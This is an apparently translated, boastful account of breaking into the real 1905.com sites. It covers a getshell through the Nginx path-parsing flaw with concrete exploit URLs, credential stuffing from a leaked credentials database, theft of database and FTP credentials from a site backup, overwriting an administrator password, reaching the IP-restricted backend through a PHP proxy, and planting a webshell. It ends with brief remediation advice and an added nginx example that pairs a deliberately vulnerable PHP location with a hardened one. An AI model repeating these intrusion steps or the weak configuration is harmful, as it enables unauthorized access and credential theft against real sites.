1905 Intranet roaming caused by an inflatable doll
Intranet roaming caused by an inflatable doll: a shell on the www.1905.com main site had already been obtained by the end of November. Brother Jianxin will hear about this.
1. Getshell via the Nginx parsing vulnerability
blog.1905.com and home.1905.com both have the Nginx parsing vulnerability, e.g.:
http://home.1905.com/robots.txt/.php
Registered a member and tried to upload; the upload fails. However, many users had published logs and albums an hour or two earlier, so new accounts probably have to be reviewed first. You have to get an existing account first.
Find a user's UID and look it up in the social engineering database.
2. Credential stuffing
With this user the upload succeeds, and we get a shell:
http://home.1905.com/attachment/201512/18/4580762_1450417652l9ad.jpg/.php
3. Intranet roaming
Ran whoami and checked the system: Linux 2.6.18. Tried all kinds of privilege-escalation exploits, and none of them worked out. So I thought about starting from somewhere else. Let's first look at which websites this server hosts:
/usr/local/nginx/conf/nginx.conf
I found that the www main site has a full-site backup in this directory.
Going in, I found a bunch of valuable information (the site's global configuration file with database, memcache and FTP hosts and credentials).
Many more lines are omitted. With so much valuable information it is easy to proceed. First, connect to the database and see what the situation is.
Pulled out the hash of the administrator account wujie (salted MD5), backed it up, and forcibly replaced the password.
When trying to log in, I found that http://www.1905.com/admin.php returned a deny... by nginx rules.
After thinking for a while: the PHPCMS log table records the backend administrators' operations, including time and URL. Does admin.php in the backend require VPN access, or is there another reason?
Checking the CMS_LOG table, the administrator always comes from the same fixed IP address, including for edits.
I noticed a detail.
forward=http%3A%2F%2Fwww1.1905.com%2Fadmin.php%3Fmod%3Dphpcms%26file%3Dhtml%26action%3Dcategory&pagesize=50&dosubmit=1&count=1
The forward parameter records the submission source. Now it is certain that www1.1905.com is the backend (write) side and www.1905.com the front-end (read) side, obviously sharing the same database. www1.1905.com/admin.php cannot be reached directly; hence the IP rule.
C:\Users\Administrator>ping www1.1905.com
Pinging www1.1905.com [60.28.236.48] with 32 bytes of data:
C:\Users\Administrator>ping www.1905.com
Pinging m1_5.xdwscache.ourglb0.com [61.138.219.87] with 32 bytes of data:
Now it is easy to know where the backend is, but another problem comes up. CMS_LOG shows that every administrator login comes from 111.202.9.82. Taking down this VPN server is still a bit difficult, or at least takes more time, so let's go straight from the intranet: access the domain www1.1905.com through a PHP proxy.
After accessing admin.php this way, I could log in with the modified wujie password.
In the backend I found that the reverse proxy does not handle scripts well; various clicks did nothing. After a long time I finally found a solution: download PHPCMS V9 from Baidu, install it on the local machine, then copy the URL address plus parameters into the reverse proxy to access the 1905 backend, and a shell is obtained: http://www1.1905.com/lpboke.php. The webshell is then connected through the reverse proxy.
A cache update file is found in the root directory of www1.1905.com. After reading the code, it is a file that cron uses to synchronize to the CDN nodes; presumably the main site updates its cache data through this file.
Created /data/html/cms/uploadfile/fuck.txt through the reverse proxy, let the file sync run, and visited the main site 10 seconds later.
Invalid.
Jianxin's sister said: wow, you are so handsome...
Solution:
Nginx parsing vulnerability = !! getting owned.
Do not keep the global database configuration file on the same server. Strict access restrictions must be imposed on the backend address. Nothing else; you know better than I do.
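As an added example (not from the original write-up or the site's own configuration), here is an nginx fragment showing the weak PHP location that lets an uploaded attachment/x.jpg/.php run as PHP, next to a hardened replacement that also restricts admin.php to a VPN egress range and blocks backup files under the web root. The IP range, the FastCGI address and the upload paths are placeholders.

```nginx
# (A) Weak, shown for contrast only: every URI ending in .php is passed to
# PHP-FPM. With cgi.fix_pathinfo=1 in php.ini, /attachment/x.jpg/.php is
# resolved to x.jpg and executed as PHP (the Nginx parsing vulnerability).
location ~ \.php$ {
    fastcgi_pass 127.0.0.1:9000;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    include fastcgi_params;
}

# (B) Hardened replacement. Also set cgi.fix_pathinfo=0 in php.ini and keep
# the php-fpm pool default security.limit_extensions = .php, so FPM itself
# refuses to run anything that is not a .php file.

# Upload directories are static only: nothing under them reaches PHP-FPM.
location ^~ /attachment/ {
    location ~ \.php { return 403; }
}
location ^~ /uploadfile/ {
    location ~ \.php { return 403; }
}

# Full-site backups and dumps must not be downloadable from the web root.
location ~* \.(sql|bak|tar|gz|zip|old)$ { deny all; }

# Backend entry point: the exact-match location wins over the regex below,
# so only the allowed range (placeholder VPN/office egress) can reach it.
location = /admin.php {
    allow 203.0.113.0/24;
    deny  all;
    try_files $uri =404;
    fastcgi_pass 127.0.0.1:9000;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    include fastcgi_params;
}

# All other PHP: the script file itself must exist before FPM is contacted,
# so /robots.txt/.php and x.jpg/.php get a 404 instead of executing.
location ~ \.php$ {
    fastcgi_split_path_info ^(.+?\.php)(/.*)$;
    set $path_info $fastcgi_path_info;   # try_files clears the split value
    try_files $fastcgi_script_name =404;
    fastcgi_pass 127.0.0.1:9000;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_param PATH_INFO $path_info;
    include fastcgi_params;
}
```

Use either block (A) or block (B) in a server context, not both, since duplicate `location ~ \.php$` entries are rejected at config test time.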